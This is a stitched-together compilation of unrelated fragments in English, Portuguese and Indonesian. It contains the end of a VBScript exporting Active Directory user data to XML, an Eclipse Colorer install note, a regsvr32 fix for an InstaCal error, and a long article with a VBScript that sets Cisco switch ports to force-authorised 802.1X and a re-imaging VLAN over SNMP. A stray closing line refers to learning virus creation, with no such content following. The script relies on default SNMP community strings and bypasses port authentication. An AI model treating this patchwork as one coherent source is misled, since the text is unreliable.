If Err.Number <> 0 Then
Call MsgBox("Search Failed.",16,"Error")
Else
End If
 If Not rs.EOF Then
  Do While Not Rs.EOF
  rs.MoveFirst
  Set oUser = GetObject(Rs.Fields("adspath"))
      sData = sData & "<ObjectCategory>"&oUser.objectCategory&_
"</ObjectCategory>"&vbNewLine
      sData = sData & "<DistinguishedName>"&oUser.distinguishedName&_
"</DistinguishedName>"&vbNewLine
      sData = sData & "<UserAccountControl>"&oUser.userAccountControl&_
"</UserAccountControl>"&vbNewLine
      sData = sData & "<USNCreated>"&oUser.whenCreated&_
"</USNCreated>"&vbNewLine
      sData = sData & "<LastChanged>"&oUser.whenChanged&_
"</LastChanged>"&vbNewLine
      sData = sData & "<ADsPath>"&oUser.ADsPath&_
"</ADsPath>"&vbNewLine
      sData = sData & "<CN>"&oUser.cn&_
"</CN>"&vbNewLine
      sData = sData & "<UserPrincipalName>"&oUser.userPrincipalName&_
"</UserPrincipalName>"&vbNewLine
      sData = sData & "<SN>"&oUser.sn&"</SN>"&vbNewLine
      sData = sData & "<Initials>"&oUser.initials&"</Initials>"&vbNewLine
      sData = sData & "<GivenName>"&oUser.givenname&"</GivenName>"&vbNewLine
      sData = sData & "<DisplayName>"&oUser.displayname&"</DisplayName>"&vbNewLine
      sData = sData & "<Description>"&oUser.description&"</Description>"&vbNewLine
      sData = sData & "<LastLogonTimestamp>"&oUser.lastLogonTimestamp&"</LastLogonTimestamp>"&vbNewLine
      sData = sData & "<Country>"&oUser.c&"</Country>"&vbNewLine
      sData = sData & "<City>"&oUser.l&"</City>"&vbNewLine
      sData = sData & "<Office>"&oUser.physicalDeliveryOfficeName&"</Office>"&vbNewLine
      sData = sData & "<Department>"&oUser.department&"</Department>"&vbNewLine
      sData = sData & "<Title>"&oUser.title&"</Title>"&vbNewLine
      sData = sData & "<legacyExchangeDN>"&oUser.legacyExchangeDN&_
"</legacyExchangeDN>"&vbNewLine
      sData = sData & "<msExchALObjectVersion>"&_
oUser.msExchALObjectVersion&_
"</msExchALObjectVersion>"&vbNewLine
      sData = sData & "<msExchUserAccountControl>"&oUser.msExchUserAccountControl&_
"</msExchUserAccountControl>"&vbNewLine
      sData = sData & "<HomeMDB>"&oUser.homeMDB&"</HomeMDB>"&vbNewLine
      sData = sData & "<HomeMTA>"&oUser.homeMTA&"</HomeMTA>"&vbNewLine
      sData = sData & "<msExchHomeServerName>"&oUser.msExchHomeServerName&_
"</msExchHomeServerName>"&vbNewLine
      sData = sData & "<mDBUseDefaults>"&oUser.mDBUseDefaults&_
"</mDBUseDefaults>"&vbNewLine
      sData = sData & "<Warning>"&oUser.mDBStorageQuota&"</Warning>"&vbNewLine
      sData = sData & "<SendLimit>"&oUser.mDBOverQuotaLimit&"</SendLimit>"&vbNewLine
      sData = sData & "<MailNickname>"&oUser.mailNickname&"</MailNickname>"&vbNewLine
      sData = sData & "<Mail>"&oUser.mail&"</Mail>"&vbNewLine
      sData = sData & "<ProxyAddresses>"&vbNewLine 
       If IsArray(oUser.proxyAddresses) Then
        For Each present In oUser.proxyAddresses
        sData = sData & "<ProxyAddress>"&present&"</ProxyAddress>"&vbNewLine
        Next
       Else
        sData = sData & "<ProxyAddress>"&oUser.proxyAddresses&"</ProxyAddress>"&vbNewLine
       End If
      sData = sData & "</ProxyAddresses>"&vbNewLine
      sData = sData & "<Groups>"&vbNewLine
       If IsArray(oUser.memberof) Then
        For Each present In oUser.memberof
        sData = sData & "<Group>"&present&"</Group>"&vbNewLine
        Next
       ElseIf oUser.memberof <> "" Then
        sData = sData & "<Group>"&oUser.memberof&"</Group>"&vbNewLine
       End If
      sData = sData & "</Groups>"&vbNewLine
  Set oUser = Nothing
  rs.MoveNext
  Loop
 Else
 Call MsgBox("No User/s found in AD with those details!",16,"Status")
 End If
rs.Close
Set Rs = Nothing
Set oRoot = Nothing
Set oDomain = Nothing
Set Conn = Nothing
Set Comm = Nothing
sDomain = ""
sBase = ""
sDepth = ""
sData = Replace(sData,"&","&amp;")
GetUserData = sData
End Function

The above code can be copied into a *.vbs file and run from the cmd line or double clicked from the file through windows explorer.

Note: The messages from the script utilize 'MSGBOX' so they are displayed rather than pushed to the command line.

Basicaly the code produces the base XML file in a String "sData" then a function is called that queries the relevant AD domain and using LDAP connects to the users "common name" entered in to the input box at the initiation of the script. The data is added to the sData String and then finaly written to the XML File.

Hope this helps!

A algum tempo atrás quando comecei a usar o eclipse para editar arquivos ASP/VBSCRIPT (não é a melhor opção, mas uma das melhores existentes no Linux), um colega, Paulo de Tarso, me apresentou o plugin Eclipse Colorer (http://colorer.sourceforge.net/eclipsecolorer/), que simplesmente colore o código asp, porém, depois de ter o computador formatado, nunca mais consegui configura-lo novamente.

A seguir os passos que fiz para instala-lo:

faça o download do pacote, e descompacte na pasta plugins do seu Eclipse:
(EclipseColorer-take5_0.8.0) http://sourceforge.net/project/showfiles.php?group_id=34855&package_id=75558

Até ai tudo bem, porém o EclipseColorer usa de uma lib própria e caso essa não tenha todas suas dependências instaladas irá ocorrer o seguinte erro:

"Error in initialization of a native part of the Colorer library. This can be caused by absent net_sf_colorer.dll (libnet_sf_colorer.so) library in paths of java machine. Or, colorer can't find catalog.xml file, wich must be placed in '%PLUGIN_DIR%/colorer/catalog.xml' Could not initilize class net.sf.colorer.ParserFactory"

como dito no erro, copie a lib que esta em .../net.sf.colorer_0.8.0/os/linux/x86 para um path que esteja visivel para o java, eu copiei para o /usr/lib mesmo
# cp libnet_sf_colorer.so /usr/lib

após isso use o comando ldd para listar as dependencias:

$ ldd /usr/lib/libnet_sf_colorer.so
linux-gate.so.1 =>  (0xb7f7e000)
libstdc++.so.5 => not found
libm.so.6 => /lib/tls/i686/cmov/libm.so.6 (0xb7eb9000)
libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7d69000)
libgcc_s.so.1 => /lib/libgcc_s.so.1 (0xb7d5e000)
/lib/ld-linux.so.2 (0xb7f7f000)

No meu caso a lib libstdc++.so.5 não existia, simplesmente dei um apt-get na libstdc++5

# apt-get install libstdc++5

Now it works ;]!! para mais informações vejam os fontes a seguir:

Fontes:
http://quattor.begrid.be/trac/centralised-begrid-v5/wiki/Configure_Eclipse
http://lists.debian.org/debian-user-portuguese/2003/12/msg00836.html

Anyway, as the application also use DAC boards from Computerboards (now Measurement Computing), I needed to instasll their Vista-compatible InstaCal driver too. Their drivers always work ok, so I was surprised when the installation repeatedly stopped with the error "Error 2738: Could not access VBScript run time for custom action". After searching the Measurement Computing forums , I went to google and it turned out that this error stems from vbscript.dll not being registered. How on earth that windows component did get unregistered I do not know, but this procedure fixed the problem:
1. Run Command Prompt as administrator
1.1 Start Menu -> All Programs -> Accessories
1.2 Right click on Command Prompt and select Run as administrator
2. Type cd c:\windows\system32 into the Command Prompt and hit Enter
3. Type regsvr32 vbscript.dll into the Command Prompt and hit Enter

Altiris scripting
The observant reader would have noticed that additional information is required before we can perform the previous five steps in a script. The mac address of the computer, the re-imaging vlan and the management IP address of the switch are also required. Variables are provided by altiris which help obtain the additional information. The mac address is provided straight up as %NIC1MACADDR%. The management IP address of the switch and re-imaging vlan aren't directly available. Altiris has no knowledge of these items. However networks built to a standard allow calculation of the remaining two parameters. The computers ip address provided in the %NIC1IPADDR% variable is used for this calculation. The example network was built to the design standard below.

• Floor vlans will be allocated in the range 100 – 299 with 10 vlans being reserved per floor.
• Floor ip addresses will be allocated in the range 192.168.32.0 – 192.168.191.255 with 8 class C networks reserved per floor.
• The first three networks and vlans per floor will be allocated to authenticated computers, guest/auth-fail computers and re-imaging vlan respectively.
• The fourth network and vlan will be reserved for future IP telephony projects.
• The fifth network will be allocated to switch management IP addresses with all others reserved for future use.
• Switch management vlans will be allocated in the range 300 – 350.
• Edge switch management address will start at 192.168.x.11

The ip address of the first network on a floor is calculated by masking the last three bits in the third octet of the computers ip address (%NIC1IPADDR%). The fifth network on each floor is reserved for switch management. Adding 4 to the third octet gives the switch management network. Assuming the last octet of the switch management IP addresses are also kept consistent, the address can be completed by simply changing the fourth octet to the standard value. Refer to the getSwitchMgmtAddr() function in listing 1.

The vlan of the first network on a floor is calculated using a similar technique. The vlan in which the computers mac address was found is divided, using integer division, by the number of vlans per floor. The result is then multiplied by the number of vlans per floor. The third network and vlan are reserved for re-imaging. Adding 2 to the first vlan on the floor will give the re-imaging vlan.

As an example, assume that the computer to be re-imaged has an ip address of 192.168.42.157 and its mac address was found in vlan 112 (probably due to a failed re-image job). Masking the last three bits of the third octet gives the first network on the floor.
00101010 (42)
AND 11111000 (248)
= 00101000 (40)
The management network is found by adding 4 to the third octet and gives 192.168.44.0/24, and the switch management ip address will be 192.168.44.11. The first vlan on a floor is calculated as (112\10) * 10 = 110. The re-imaging vlan is found by adding 2 to give 112. Note that the use of integer division- denoted by \ rather than / - means that remainders are ignored.

Not every network is the way we would design it with hindsight. Networks often grow in odd ways. You may have inherited a flat network that won't lend itself to this kind of calculation. In this case you can simply build an array of switch management ip addresses and loop through steps one and two for each switch until the bridgeport on which the mac address appears is found on a non-trunking port. Then continue with steps three to five.

The script in listing 1 should be easy to customise for your environment. Pay particular attention to the constants defined at the beginning, the regular expression patterns used to match the output from the snmp commands, and the snmp commands. If you aren't familiar with regular expressions take a look at "Mastering Regular expressions" by Jeffrey Friedl.

With snmp and a modicum of scripting know-how you can now have dot1x security without fearing an uprising of angry helpdesk staff.

References

How To Add, Modify, and Remove VLANs on a Catalyst Using SNMP. (October 26, 2005).
     Retrieved 11 November, 2006, from
     http://www.cisco.com/en/US/tech/tk648/tk362/technologies_tech_note09186a00801c6035.shtml

Using SNMP to Find a Port Number from a MAC Address on a Catalyst Switch. (October 26, 2005).
     Retrieved 11 November, 2006, from
     http://www.cisco.com/en/US/tech/tk648/tk362/technologies_tech_note09186a00801c9199.shtml

How To Get Dynamic CAM Entries (CAM Table) for Catalyst Switches Using SNMP. (October 26, 2005).
     Retrieved 11 November, 2006, from
     http://www.cisco.com/en/US/tech/tk648/tk362/technologies_tech_note09186a0080094a9b.shtml

How to Get VLAN Information From a Catalyst Using SNMP. (October 26, 2005).
     Retrieved 11 November, 2006, from
     http://www.cisco.com/en/US/tech/tk648/tk362/technologies_configuration_example09186a008015773e.shtml

SNMP Community String Indexing. (October 26, 2005).
     Retrieved 11 November, 2006, from
     http://www.cisco.com/en/US/tech/tk648/tk362/technologies_tech_note09186a00801576ff.shtml

IEEE Standard for Local and metropolitan area networks—Port-Based Network Access Control. (2004).
     Retrieved 11 November, 2006, from
     http://standards.ieee.org/getieee802/download/802.1X-2004.pdf

Friedl, J. (2002). Mastering Regular Expressions (Second ed.): O'Reilly Media Inc.

Listing 1


option explicit
const REIMAGE_VLAN_OFFSET = 2
const VLAN_FLOOR_INCREMENT = 20
const SW_MGMT_LAST_OCTET = 11
const FORCEUNAUTHORISED = 1
const AUTO = 2
const FORCEAUTHORISED = 3
const VMVLAN = ".1.3.6.1.4.1.9.9.68.1.2.2.1.2."
const dot1xAuthAuthControlledPortControl = ".1.0.8802.1.1.1.1.2.1.1.6."
const VTPVLANSTATE = " .1.3.6.1.4.1.9.9.46.1.3.1.1.2 "
const DOT1DTPFDBPORT = " .1.3.6.1.2.1.17.4.3.1.2"
const DOT1DBASEPORTIFINDEX = " .1.3.6.1.2.1.17.1.4.1.2."
const vlanPortIslVlansAllowed = " .1.3.6.1.4.1.9.5.1.9.3.1.5.1.1 "
const SNMPGETCMD2 = "f:\usr\bin\snmpget.exe -Ov -v 2c -c "
const SNMPWALKCMD = "f:\usr\bin\snmpwalk.exe -OnqUe -v 2c -c "
const SNMPSETCMD = "f:\usr\bin\snmpset.exe -v 2c -c "
const SNMPGETCMD = "f:\usr\bin\snmpget.exe -OnqUe -v 2c -c "
const SNMPWRITE = " private "
const SNMPREAD = " public "
const SNMPREADV = " public@" 'need community name and vlan for some info
const SHUTDOWNCMD = "c:\windows\system32\shutdown.exe -m "
const SHUTDOWNARGS = " -r -f -t 1"

dim arrVlans, vlan
dim bridgeport, ifindex
dim strMgmtIP, strMACAddress, WshShell, intresult, strAgntAddr

Set WshShell = CreateObject("WScript.Shell")

'************************************************************************
'  get the switch management IP address                                 *
'         Altiris provides us with the mac address                      *
'************************************************************************
if "%NIC1IPADDR%" = "0.0.0.0" then
  strMgmtIP = getSwitchMgmtAddr("%NIC2IPADDR%")
  strMACAddress = lcase("%NIC2MACADDR%")
  strAgntAddr = "%NIC2IPADDR%"
Else
  strMgmtIP = getSwitchMgmtAddr("%NIC1IPADDR%")
  strMACAddress = lcase("%NIC1MACADDR%")
  strAgntAddr = "%NIC1IPADDR%"
end if

'************************************************************************
' Step one - get the list of vlans                                      *
'************************************************************************
arrVlans = enum_AllowedVLAN(strMgmtIP)

'************************************************************************
' Step two - get the bridgeport                                         *
'************************************************************************
for each vlan in arrVlans
  bridgeport = getBridgePort(strMgmtIP, vlan, strMACAddress)
  if bridgeport <> "" then
    exit for
  end if
next
if bridgeport = "" then
  wshShell.logevent 1,"Bridgeport not found for mac address "  & _
        strMACAddress & " For Computer %NAME%"
  wscript.quit
end if

'************************************************************************
' Step three - get the interface index                                  *
'************************************************************************
ifindex = getIFIndex(strMgmtIP, vlan, bridgeport)
if ifindex = "" then
  wshShell.logevent 1,"ifindex not found for mac address "  & _
        strMACAddress & " For Computer %NAME%"
  wscript.quit
end if

'************************************************************************
' Step four - set the dot1x port control                                *
'************************************************************************
intresult = setPortControl(strMgmtIP,ifindex, FORCEAUTHORISED)

'************************************************************************
' reboot the computer so that it picks up a new dhcp address            *
'        in the re-imaging vlan.                                        *
'************************************************************************
RebootComputer("\\" & strAgntAddr)

'************************************************************************
' Step five - set the vlan to our re-imaging vlan                       *
' note the use of integer division operator \                           *
'************************************************************************
vlan = (vlan \ VLAN_FLOOR_INCREMENT ) * VLAN_FLOOR_INCREMENT _
         + REIMAGE_VLAN_OFFSET
intresult = intresult + setVlan(strMgmtIP,ifindex, vlan)
if intresult = 0 then
  wshShell.logevent 4, "Reimage vlan " & Vlan & " for %NAME%," & _
        StrMgmtIP & "," & ifindex
Else
  wshShell.logevent 1, "Port " & ifindex & " on " & StrMgmtIP & _
        " for %NAME% was Not set correctly"
End If
wscript.quit

'************************************************************************
'FUNCTION:                                                              *
'       setVlan(strAgent,intIFIndex, intVlan)                           *
'                                                                       *
'Purpose:                                                               *
'       set the port specified by the interface index suitable to       *
'       the specified vlan                                              *
'                                                                       *
'Inputs:                                                                *
'       strAgent: management IP address of the switch                   *
'       intIFIndex: port interface index returned from getIFIndex()     *
'       intVlan : the vlan to which the port should be configured       *
'                                                                       *
'Returns:                                                               *
'       Integer, 0 if successful or a positive value on failure.        *
'                                                                       *
'Calls:                                                                 *
'       SNMPSETCMD - constant defining the path to an external          *
'       program and options used to perform an snmp set                 *
'                                                                       *
'Comments:                                                              *
'       CISCO-VTP-MIB is cisco specific.                                *
'       Reference cisco Document ID: 45080                              *
'       "How To Add, Modify, and Remove VLANs on a Catalyst Using SNMP" *
'       viewed at                                                       *
'       http://www.cisco.com/en/US/tech/tk648/tk362/                    *
'                technologies_tech_note09186a00801c6035.shtml           *
'       on 16/11/2006                                                   *
'************************************************************************
function  setVlan(strAgent,intIFIndex, intVlan)
dim WshShell, oExec
dim stroutput

  Set WshShell = CreateObject("WScript.Shell")
  Set oExec = WshShell.Exec(SNMPSETCMD & SNMPWRITE & " " & strAgent & _
                " " & VMVLAN & intIFIndex & " i " & intVlan)
  Do while Not oExec.StdOut.AtEndOfStream
    stroutput = oExec.StdOut.readall
  Loop
  Do While oExec.Status <> 1
    WScript.Sleep 100
  Loop
  setVlan = instr(1, stroutput, "Error")
end function

'************************************************************************
'FUNCTION:                                                              *
'       setPortControl(strAgent,intIFIndex, intPortControl)             *
'                                                                       *
'Purpose:                                                               *
'       sets the PaeControlledPortControl value which controls whether  *
'       dot1x authentication is required.                               *
'                                                                       *
'Inputs:                                                                *
'       strAgent: management IP address of the switch                   *
'       intIFIndex: port interface index returned from getIFIndex()     *
'       intPortControl : the control values of the authenticator PAE    *
'               controlled port. Allowed values are                     *
'               forceUnauthorized(1), auto(2),forceAuthorized(3)        *
'                                                                       *
'Returns:                                                               *
'       Integer, 0 if successful or a positive value on failure.        *
'                                                                       *
'Calls:                                                                 *
'       SNMPSETCMD - constant defining the path to an external          *
'       program and options used to perform an snmp set                 *
'                                                                       *
'Comments:                                                              *
'       Reference IEEE Std 802.1X-2001                                  *
'       "IEEE Standard for Local and metropolitan area networks—        *
'               Port-Based Network Access Control"                      *
'       viewed at                                                       *
'       http://standards.ieee.org/getieee802/download/802.1X-2001.pdf   *
'       on 16/11/2006                                                   *
'************************************************************************
function  setPortControl(strAgent,intIFIndex, intPortControl)
dim WshShell, oExec
dim stroutput

  if (intPortControl < FORCEUNAUTHORISED or _
                intPortControl > FORCEAUTHORISED) then
    setPortControl = 1
    exit function
  end if
  Set WshShell = CreateObject("WScript.Shell")
  Set oExec = WshShell.Exec(SNMPSETCMD & SNMPWRITE & " " & strAgent & _
                " " & dot1xAuthAuthControlledPortControl & intIFIndex &_
                " i " & intPortControl)
  Do while Not oExec.StdOut.AtEndOfStream
    stroutput = oExec.StdOut.readall
  Loop
  Do While oExec.Status <> 1
    WScript.Sleep 100
  Loop
  setPortControl = instr(1, stroutput, "Error")
end function

'************************************************************************
'FUNCTION:                                                              *
'       getIFIndex(strAgent, intVlan, intBridgePort)                    *
'                                                                       *
'Purpose:                                                               *
'       convert a bridgeport value to an interface index suitable for   *
'       use with the setvlan() and setportcontrol() functions           *
'                                                                       *
'Inputs:                                                                *
'       strAgent: management IP address of the switch                   *
'       intVlan : the vlan specific instance of the forwarding table    *
'       intBridgePort: bridgeport value returned from getBridgePort()   *
'                                                                       *
'Returns:                                                               *
'       String containing the interface index, or an empty string on    *
'       failure                                                         *
'                                                                       *
'Calls:                                                                 *
'       SNMPGETCMD - constant defining the path to an external          *
'       program and options used to perform an snmp get                 *
'                                                                       *
'Comments:                                                              *
'       Uses community string indexing to reference the per vlan mib    *
'       instance.                                                       *
'       Reference cisco Document ID: 44800                              *
'       "Using SNMP to Find a Port Number from a MAC Address on a       *
'       Catalyst Switch" viewed        at                               *
'       http://www.cisco.com/en/US/tech/tk648/tk362/                    *
'               technologies_tech_note09186a00801c9199.shtml            *
'       on 16/11/2006                                                   *
'************************************************************************
function getIFIndex(strAgent, intVlan, intBridgePort)
dim WshShell, oExec
dim re 'as regexp
dim matches
dim match
dim tempstr, stroutput

  Set WshShell = CreateObject("WScript.Shell")
  Set oExec = WshShell.Exec(SNMPGETCMD & SNMPREADV & intVlan & " " & _
                strAgent & " " & DOT1DBASEPORTIFINDEX & intBridgePort)
  Do while Not oExec.StdOut.AtEndOfStream
    stroutput = oExec.StdOut.readall
  Loop
  Do While oExec.Status <> 1
    WScript.Sleep 100
  Loop

  set re = new regexp
  re.global = True
  re.multiline = True
'Pattern to capture the last digits of the snmp output
'output lines from SNMPCMD should look like
'                ".1.3.6.1.2.1.17.1.4.1.2.108 11002"
  re.pattern = "^" & trim(DOT1DBASEPORTIFINDEX) & intBridgePort & _
                "\s+(\d+)$"

  tempstr = ""
  set matches = re.execute(stroutput)
  for each match in matches
    tempstr = match.submatches(0)
  next
  getIFIndex = tempstr
end function

'************************************************************************
'FUNCTION:                                                              *
'       getBridgePort(strAgent, intVlan, strmac)                        *
'                                                                       *
'Purpose:                                                               *
'       examine the switch forwarding tables for the specified mac      *
'       address in the specified vlan                                   *
'                                                                       *
'Inputs:                                                                *
'       strAgent: management IP address of the switch                   *
'       intVlan : the vlan specific instance of the forwarding table    *
'       strmac  : Mac address string in the format 0040CA6934EE         *
'                                                                       *
'Returns:                                                               *
'       String containing the bridgeport if found or an empty string    *
'                                                                       *
'Calls:                                                                 *
'       SNMPGETCMD - constant defining the path to an external          *
'       program and options used to perform an snmp get                 *
'                                                                       *
'Comments:                                                              *
'       Uses community string indexing to reference the per vlan mib    *
'       instance.                                                       *
'       Reference cisco Document ID: 44800                              *
'       "Using SNMP to Find a Port Number from a MAC Address on a       *
'       Catalyst Switch" viewed        at                               *
'       http://www.cisco.com/en/US/tech/tk648/tk362/                    *
'               technologies_tech_note09186a00801c9199.shtml            *
'       on 16/11/2006                                                   *
'************************************************************************
function getBridgePort(strAgent, intVlan, strmac)
dim WshShell, oExec
dim re 'as regexp
dim matches
dim match
dim tempstr, stroutput

  Set WshShell = CreateObject("WScript.Shell")
  Set oExec = WshShell.Exec(SNMPGETCMD & SNMPREADV & intVlan & " " & _
        strAgent & " " & DOT1DTPFDBPORT & mac2oid(strmac))
  Do while Not oExec.StdOut.AtEndOfStream
    stroutput = oExec.StdOut.readall
  Loop
  Do While oExec.Status <> 1
    WScript.Sleep 100
  Loop
 set re = new regexp
  re.global = True
  re.multiline = True
'output lines from SNMPCMD should look like
'        ".1.3.6.1.2.1.17.4.3.1.2.0.64.202.105.52.238 108"
'Pattern to capture the snmpget output
  re.pattern = "^" & trim(DOT1DTPFDBPORT) & mac2oid(strmac) & "\s+(\d+)$"

  tempstr = ""
  set matches = re.execute(stroutput)
  for each match in matches
    tempstr = match.submatches(0)
  next
  getBridgePort = tempstr
end function

'************************************************************************
'FUNCTION:                                                              *
'       enum_AllowedVLAN(strAgent)                                      *
'Purpose:                                                               *
'       enumerate the vlans configured on the switch.                   *
'                                                                       *
'Inputs:                                                                *
'       strAgent: management IP address of the switch                   *
'                                                                       *
'Returns:                                                               *
'       Array with each element containing a vlan number                *
'                                                                       *
'Calls:                                                                 *
'       SNMPGETCMD2 - constant defining the path to an external         *
'       program and options used to perform an snmp get operation.      *
'       fmtBinary - function to left pad a binary number with zeros     *
'       ToBinary - function to convert an integer to a binary string    *
'                                                                       *
'Comments:                                                              *
'       CISCO-STACK-MIB  is cisco specific.                             *
'       Reference Cisco SNMP Object Navigator viewed at                 *
'       http://tools.cisco.com/Support/SNMP/do/BrowseOID.do?            *
'              objectInput=vlanPortIslVlansAllowed&translate=Translate& *
'              submitValue=SUBMIT&submitClicked=true                    *
'       on 16/11/2006                                                   *
'************************************************************************
function enum_AllowedVLAN(strAgent)
dim WshShell, oExec
dim re 'as regexp
dim matches
dim match, submatch
dim tempstr, stroutput, index, vlans

  Set WshShell = CreateObject("WScript.Shell")
  Set oExec = WshShell.Exec(SNMPGETCMD2 & SNMPREAD & " " & _
                strAgent & " " & vlanPortIslVlansAllowed)
  Do while Not oExec.StdOut.AtEndOfStream
    stroutput = oExec.StdOut.readall
  Loop
  Do While oExec.Status <> 1
    WScript.Sleep 100
  Loop
  tempstr = ""

  set re = new regexp
  re.global = True
  re.multiline = True
'Pattern to capture the hex digits representing the allowed vlans.
  re.pattern = "[0-9a-fA-F]{2}"

  vlans = ""
  if instr(1,stroutput, "Hex-STRING:") > 0  then
    set matches = re.execute(stroutput)
    for each match in matches
      tempstr =  tempstr & fmtBinary(ToBinary(cint("&H" & match)), 8)
      next
    tempstr = strreverse(tempstr)
    index = 1
    do
      index = instr(index, tempstr, "1")
      if index <> 0 then
        vlans = vlans & " " & index - 1
        index = index + 1
      end if
    loop until index = 0
  end if
  enum_AllowedVLAN = split(trim(vlans))
end function

'************************************************************************
'FUNCTION:                                                              *
'       fmtBinary(strNumber, intLength)                                 *
'PURPOSE:                                                               *
'       function to left pad a binary number with zeros                 *
'                                                                       *
'INPUTS:                                                                *
'       strNumber: binary number to left pad with zeros                 *
'       intLength: The desired bit length of the binary number          *
'                                                                       *
'RETURNS:                                                               *
'       string containing the binary representation of the input.       *
'                                                                       *
'CALLS:                                                                 *
'       Nothing                                                         *
'                                                                       *
'COMMENTS:                                                              *
'************************************************************************
function fmtBinary(strNumber, intLength)
  fmtBinary = string(intLength - len(strNumber), "0") & strNumber
end function

'************************************************************************
'FUNCTION:                                                              *
'       ToBinary(intNumber)                                             *
'                                                                       *
'PURPOSE:                                                               *
'       convert an integer number to binary.                            *
'                                                                       *
'Inputs:                                                                *
'       intNumber: Number to convert to binary                          *
'                                                                       *
'Returns:                                                               *
'       string containing the binary representation of the input.       *
'                                                                       *
'Calls:                                                                 *
'       Nothing                                                         *
'                                                                       *
'Comments:                                                              *
'       note the use of \ (integer division operator) rather than /     *
'************************************************************************
function ToBinary(intNumber)
  if intNumber > 0 then
    ToBinary = ToBinary(intNumber\2) & intNumber mod 2
  end if
end function

'************************************************************************
'FUNCTION:                                                              *
'       enum_VLAN(strAgent)                                             *
'Purpose:                                                               *
'       enumerate the vlans configured on the switch.                   *
'                                                                       *
'Inputs:                                                                *
'       strAgent: management IP address of the switch                   *
'                                                                       *
'Returns:                                                               *
'       Array with each element containing a vlan number                *
'                                                                       *
'Calls:                                                                 *
'       SNMPWALKCMD - constant defining the path to an external         *
'       program used to perform an snmp walk                            *
'                                                                       *
'Comments:                                                              *
'       CISCO-VTP-MIB is cisco specific.                                *
'       Reference cisco Document ID: 41003                              *
'       "How to Get VLAN Information From a Catalyst Using SNMP" viewed *
'       at http://www.cisco.com/en/US/tech/tk648/tk362/technologies_    *
'                configuration_example09186a008015773e.shtml            *
'        on 16/11/2006                                                  *
'************************************************************************
function enum_VLAN(strAgent)
dim WshShell, oExec
dim re 'as regexp
dim matches
dim match
dim tempstr, stroutput

  set re = new regexp
  re.global = True
  re.multiline = True
'output lines from SNMPCMD should look like
'        ".1.3.6.1.4.1.9.9.46.1.3.1.1.2.1.125 1"
'Pattern to capture the last digits of the snmp OID
'Include VTPVLANSTATE in the pattern to minimise regex engine backtracking
  re.pattern = "^" & VTPVLANSTATE & "(?:\.\d+)+\.(\d+)\s+\d+$"

  Set WshShell = CreateObject("WScript.Shell")
  Set oExec = WshShell.Exec(SNMPWALKCMD & SNMPREAD & " " & strAgent & " " & VTPVLANSTATE)
  Do while Not oExec.StdOut.AtEndOfStream
    stroutput = oExec.StdOut.readall
  Loop
  Do While oExec.Status <> 1
    WScript.Sleep 100
  Loop
  tempstr = ""
  set matches = re.execute(stroutput)
  for each match in matches
    tempstr = tempstr & match.submatches(0) & " "
  next
  enum_VLAN = split(trim(tempstr))
end function

'************************************************************************
'FUNCTION:                                                              *
'       mac2OID(strmac)                                                 *
'Purpose:                                                               *
'       Convert mac address string to a decimal string for snmp queries.*
'                                                                       *
'Inputs:                                                                *
'       strmac: Mac address string in the format 0040CA6934EE           *
'                                                                       *
'Returns:                                                               *
'       snmp OID string of the form .0.64.202.105.52.238 or an empty    *
'        string ("") if an error occured.                               *
'                                                                       *
'Calls:                                                                 *
'       Hex2Dec                                                         *
'                                                                       *
'Comments:                                                              *
'        No error checking is performed on the input character set.     *
'        The input string is validated by length only.                  *
'************************************************************************
function mac2OID(strmac)
dim intOctet
dim arrOctet
dim strOID

  strOID = ""
  if len(strmac) = 12 then
    for intOctet = 1 to 11 step 2
      strOID = strOID & "." & Hex2Dec(mid(strmac,intOctet,2))
    next
  end if
  mac2OID = strOID
end function

'************************************************************************
'FUNCTION:                                                              *
'       Hex2Dec(strHex)                                                 *
'Purpose:                                                               *
'       Convert a string representation of a hexadecimal number to a    *
'       decimal string.                                                 *
'                                                                       *
'Inputs:                                                                *
'       strHex: string containing hexadecimal characters [0-9a-fA-F]    *
'                                                                       *
'Returns:                                                               *
'       string containing the input converted to decimal characters[0-9]*
'                                                                       *
'Calls:                                                                 *
'       Nothing                                                         *
'                                                                       *
'Comments:                                                              *
'       No error checking is performed on the input.                    *
'       Beware of overflow in CInt function. Consider modifying to Clng *
'       before using in other code.                                     *
'************************************************************************
Function Hex2Dec(strHex)
Hex2Dec = "" & CInt("&H" & strHex)
End Function

'************************************************************************
'FUNCTION:                                                              *
'       getSwitchMgmtAddr(clientIPAddr)                                 *
'Purpose:                                                               *
'       Determine the switch management IP address from the client IP   *
'       address.                                                        *
'                                                                       *
'Inputs:                                                                *
'       clientIPAddr: string the client IP address in dotted notation   *
'                                                                       *
'Returns:                                                               *
'       string containing the switch management IP address in dotted    *
'       notation.                                                       *
'                                                                       *
'Calls:                                                                 *
'       Nothing                                                         *
'                                                                       *
'Comments:                                                              *
'       No error checking is performed on the input.                    *
'************************************************************************
Function getSwitchMgmtAddr(clientIPAddr)
dim intOctet
dim arrOctet

  arrOctet = split(clientIPAddr, ".")
  intOctet = arrOctet(2) and &HF8
  arrOctet(2) = intOctet + 4
  arroctet(3) = SW_MGMT_LAST_OCTET
  getSwitchMgmtAddr = join(arrOctet, ".")
end Function

'************************************************************************
'SUBROUTINE:                                                            *
'       RebootComputer(AgentName)                                       *
'Purpose:                                                               *
'       Perform a remote reboot of the specified computer               *
'                                                                       *
'Inputs:                                                                *
'       AgentName: string containing the host to reboot as hostname or  *
'       ip address preceded by two backslashes ie \\192.168.32.100      *
'                                                                       *
'Returns:                                                               *
'       Nothing                                                         *
'                                                                       *
'Calls:                                                                 *
'       external OS utility c:\windows\system32\shutdown.exe            *
'                                                                       *
'Comments:                                                              *
'       No error checking is performed on the input.                    *
'************************************************************************
sub RebootComputer(AgentName)
dim WshShell, oExec
dim stroutput

  Set WshShell = CreateObject("WScript.Shell")
  Set oExec = WshShell.Exec(SHUTDOWNCMD & AgentName & SHUTDOWNARGS)
  Do while Not oExec.StdOut.AtEndOfStream
    stroutput = oExec.StdOut.readall
  Loop
  Do while Not oExec.Stderr.AtEndOfStream
    stroutput = stroutput & oExec.Stderr.readall
  Loop
  Do While oExec.Status <> 1
    WScript.Sleep 100
  Loop
  if len(stroutput) <> 0 then
    wshShell.logevent 1, AgentName & _
        " did not accept the reboot request" & VBCRLF & stroutput
  end if
end sub

Catatan:Untuk yang ingin memahami pembuatan virus (yang sudah master boleh lewat)

